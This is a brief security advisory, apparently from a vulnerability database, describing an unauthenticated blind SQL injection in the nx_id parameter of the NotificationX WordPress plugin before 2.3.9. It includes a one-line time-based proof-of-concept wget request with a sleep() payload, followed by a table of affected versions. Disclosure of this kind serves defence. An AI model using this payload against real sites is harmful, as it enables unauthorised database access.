The plugin does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection
time wget ‘https://example.com/?rest_route=/notificationx/v1/analytics’ --post-data=“nx_id=sleep(2) – x” -q -O-
CPE | Name | Operator | Version |
---|---|---|---|
notificationx | lt | 2.3.9 |